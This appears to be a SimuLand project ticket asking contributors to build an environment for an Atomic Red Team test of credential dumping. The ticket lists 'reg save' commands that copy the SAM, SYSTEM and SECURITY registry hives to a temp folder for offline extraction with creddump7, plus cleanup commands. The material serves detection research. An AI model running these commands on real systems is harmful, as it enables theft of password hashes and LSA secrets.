[SD-ART-T1003.002-01] Registry dump of SAM, creds, and secrets - SimuLand Request #34
Description
Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: Windows
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
Tasks:
- Create an issue in SimuLand GitHub Repo with a request to run this atomic test
- Start collaboration with contributors to SimuLand and make sure someone is assigned to the creation of the environment.
- Close ticket and move it to done once the issue is create in the other project and someone is assigned to it